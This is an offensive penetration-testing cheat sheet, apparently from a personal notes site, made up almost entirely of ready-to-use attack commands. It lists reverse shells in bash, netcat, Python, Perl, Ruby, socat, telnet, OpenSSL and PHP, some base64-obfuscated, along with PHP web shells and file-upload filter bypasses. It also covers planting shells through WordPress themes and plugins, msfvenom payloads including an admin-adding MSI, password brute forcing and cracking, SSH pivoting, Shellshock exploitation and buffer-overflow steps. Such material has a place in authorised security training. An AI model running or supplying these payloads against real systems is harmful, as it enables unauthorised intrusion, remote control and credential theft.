Exploitation Cheat Sheet

Reverse Shells

Netcat

nc -e /bin/bash IPADDRESS PORT
nc -c /bin/bash IPADDRESS PORT

Netcat no -e or -c

rm -f /var/tmp/backpipe 
mknod /var/tmp/backpipe p
nc IPADDRESS PORT 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe

Bash

bash -i >& /dev/tcp/10.0.0.18/8080 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

#TCP

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.22",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

#UDP-use socat UDP listener

python -c 'import socket,pty,os;lhost = "10.10.15.80"; lport = 100; s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM); s.connect((lhost, lport)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); os.putenv("HISTFILE",'/dev/null'); pty.spawn("/bin/bash"); s.close();

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Socat

#Listener

socat file:`tty`,raw,echo=0 tcp-listen:4444

#Victim

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444

#UDP Listener

socat file:`tty`,echo=0,raw  udp-listen:100

Telnet

# Using Telnet and a created node

mknod /var/tmp/backpipe p; telnet 10.11.0.55 53 0</var/tmp/backpipe | /bin/bash 1>/var/tmp/backpipe

# Using Telnet and Telnet

telnet 10.11.0.55 53 | /bin/bash | telnet 10.11.0.55 54

OpenSSL Encrypted Reverse Shell

# Generate certificate:

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes

# Listener: 

openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>

# Reverse Shell:

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <ATTACKER-IP>:<PORT> > /tmp/s; rm /tmp/s

Upgrade Reverse Shell to Support tab completion/hot keys

# In reverse shell
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z

# In Kali
stty raw -echo
fg

# In reverse shell-optional
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

PHP

# PHP reverse shell
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

# Simple PHP shell.php
<?php echo shell_exec("bash -i >& /dev/tcp/192.168.226.128/443 0>&1");?>

#PHP popen
<?php popen("(nc -nv $_GET[0] 443 -e /bin/bash)2>&1","r"); ?>
URL:http://example.com/malicious-shell.php?0=10.0.0.10	

#PHP fsockopen
<?php fsockopen("10.11.0.10", 443);`/bin/sh -i <&3 >&3 2>&3`; ?>

#PHP Reverse Shell with Base64
<?php shell_exec(base64_decode("cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTEuMC41MyI7JHA9MTIzNDtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsn"))?>

PAYLOAD: <?=`$_GET[0]`?>
URL: http://website.com/cmd.php?0=

PAYLOAD: <?=$_GET[0]($_POST[1]);?>
URL: http://website.com/cmd.php?0=shell_exec -d 1=id

PAYLOAD: <?php export($_GET); $a($b)?>
URL: http://example.com/shell.php?a=system&b=id

PAYLOAD: <?php system($_GET["cmd"]); ?>
URL: http://example.com/shell.php?cmd=id

PAYLOAD: <?php shell_exec(base64_decode($_GET["cmd"])) ?>

SSH

Reverse Shell

This attack requires having credentials on both machines, and can be used for NAT-ed environments.
	
#Executed on remote host.
ssh -NR 60000:localhost:22 user@10.11.0.55
	
#Executed on attacking machine.
ssh user@localhost -p 60000

Have SSH execute a command before the remote shell is loaded

ssh user@10.11.0.100 -t "/bin/sh"

Try to get SSH to not load the shell's rc file

ssh user@10.11.0.100 -t "bash --noprofile"

Shellshock

ssh user@10.11.0.100 -t "() { :; }; /bin/bash"

File Transfers

php ftp sequence to transfer netcat on linux

<?php echo shell_exec("echo open 192.168.42.102 21>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo user offsec lab>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo get netcat /usr/local/databases/netcat>>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye>> /usr/local/databases/ftp.txt");?>

<?php echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>

Windows FTP via text file

echo open 192.168.1.101 21> ftp.txt
echo USER username>> ftp.txt
echo mypassword>> ftp.txt
echo bin>> ftp.txt
echo GET wget.exe>> ftp.txt
echo bye>> ftp.txt
	
ftp -v -n -s:ftp.txt

Powershell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://IPADDRESS/file.exe" >>wget.ps1
echo $file = "output-file.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
	
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

TFTP, usually enabled by default in Server 2003, XP, and below

Start tftp server on Kali
aftpd start

Transfer files from Kali to Windows (from windows terminal)
tftp -I IPADDRESS GET nameoffile.exe

FreeBSD

fetch http://IPADDRESS/filename

Command Injection

command1 && command2 that will run command2 if command1 succeeds.

command1 || command2 that will run command2 if command1 fails.

command1 ; command2 that will run command1 then command2.

command1 | command2 that will run command1 and send the output of command1 to command2

$(command)

# Windows
	
	&

Bypassing File Uploads

# Bypass client side checking
Submit Request through burp and change file extension with intercept from .jpg back to .php

# Double Extension Injection
shell.jpg.php

# Invalid Extension Bypass
shell.php.fake

#Bypass Content-Type Verification
Intercept in burp and change Content-Type to image/gif, image/jpg, or image/png

# Null byte Injection
shell.php%00.jpg

Or edit the hex in the request in burp to 00

# Upload .htaccess
# Example .htaccess contains: AddType application/x-httpd-php .jpg
# This instructs Apache to run .jpg files as php, then upload malicious jpg

# Bypass blacklists
PHP, pHp, PhP, pHP, php3, php4, php5, php7, phtml, etc

# Content Length Bypass
Use a small payload: <?system($_GET[0]);
Or fill file with lots of junk 

# Image Header in File
GIF89a; 
<?php INSERT PAYLOAD ?>

Word Press

Once logged into the interface try to get reverse shell by either editing an existing theme, uploading a new theme, or uploading a new plugin.

Editing a theme, paste in your own reverse shell code and browse to it, normally it's under http://IPADDRESS/wp-content/themes/nameoftheme/page.php

If uploading as a plugin, make sure the shell.php file has the appropriate plugin comments or it will "fail" when uploading. Comments should look like this:
	
	/*
	    Plugin Name: WordPress Shell
	    Plugin URI: https://hackerman.com
	    Description: blah blah
	    Author: Hackerman
	    Version: 0.2
	    Author URI: https://hackerman.com
	    */
	
	Then browse to the plugin page, normally: http://IPADDRESS/wp-content/plugins/shell/shell.php

Generating Payloads

PHP reverse shell payload

msfvenom -p php/reverse_php LHOST=YOURIPADDRESS LPORT=443 > shell.php

Windows reverse shellcode for python script buffer overflow

msfvenom -p windows/shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f c -e x86/alpha_mixed -b "\x00\x04\xcd\x77\x3f"

Windows bind shellcode for python script buffer overflow

msfvenom -p windows/shell_bind_tcp LPORT=444 -f c -e x86/shikata_ga_nai -b  "\x00\x04\xcd\x77\x3f"

Meterpreter exe with reverse shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOURIPADDRESS LPORT=4444 -f exe > meterpreter.exe
	
64-bit
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.12.120 LPORT=4444 -f exe > met64.exe

WAR file for Apache Tomcat.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOURIPADDRESS LPORT=443 -f war > shell.war

to find malicious js file extract shell.war then browse to js file in browser
jar -xvf shell.war

Windows MSI

msfvenom -f msi-nouac -p windows/adduser USER=hackerman PASS=password -o add_user.msi

Javascript

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.121 LPORT=443 -f js_le

Linux elf binary

msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.121 LPORT=443 -b "\x00" -f elf -o filename

Brute Forcing

MSSQL

hydra -l sa -P /usr/share/wordlists/rockyou.txt IPADDRESS mssql

medusa -h IPADDRESS -u sa -P /usr/share/wordlists/rockyou.txt -e nsr -m mssql -nPORTNUMBER

RDP

ncrack -u administrator -P /usr/share/wordlists/rockyou.txt -p 3389 IPADDRESS

SSH

hydra -l root -P /usr/share/wordlists/rockyou.txt IPADDRESS ssh

medusa -h IPADDRESS -u root -P /usr/share/wordlists/rockyou.txt -e nsr -m ssh

Word Press

hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form"/wp-login.php:log=^USER^&pwd=^PASS^:S=Location\:.*/wp-admin/" -e nsr

FTP

hydra -l admin -P /usr/share/wordlists/rockyout.txt IPADDRESS -e nsr ftp

HTTP POST

hydra -l admin -P /usr/share/wordlists/rockyou.txt IPADDRESS http-post-form "/login.php:username=^USER^&password=^PASS^:FAILMESSAGE" -e nsr

Password Cracking

hashcat -m 1800 -a 0 -o hashes.txt --remove hashes.txt rockyou.txt

Identify hashes

hash-identifier

SSH passphrase

ssh2john id_rsa  > sshtocrack
john --wordlist=/usr/share/wordlists/rockyou.txt sshtocrack

SSH tunnels and Port Forwarding

Port forward with plink on Windows

plink.exe -l root -R 445:127.0.0.1:445 YOURIPADDRESS

Meterpreter port forward

portfwd add -l 9090 -p 9090 -r TARGETIP

create dynamic ssh tunnel over port for use with proxychains

ssh -f -N -D 8080 root@IPADDRESS

Proxychains to open up another SSH tunnel through pivot machine hopping

proxychains4 ssh -f -N -D 8090 hackerman@10.1.1.1 -p 222

Send reverse ssh tunnel to your machine

ssh -R 8090:localhost:8090 YOURIPADDRESS

ShellShock

() { :; };

Reverse shell

()  { :; }; /bin/bash -c /bin/bash -i  >& /dev/tcp/YOURIPADDRESS/PORT 0>&1 &
	
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80

Buffer Overflow

Generate unique pattern using metasploit module

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000

Find unique pattern that EIP displays

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 42376942

Check for bad chars, insert into script then check debugger for any breaks in sequence

badchars = ( 
 "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10" 
 "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20" 
 "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
 "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 
 "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
 "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60" 
 "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
 "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80" 
 "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
 "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0" 
 "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
 "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0" 
 "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0" 
 "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
 "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
 "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" )

Find JMP ESP address ("\xff\xe4") using mona.py in debugger

!mona find -s "\xff\xe4" -m nameofprogram.dll
PreviousNotes VANextInitial Enumeration

Last updated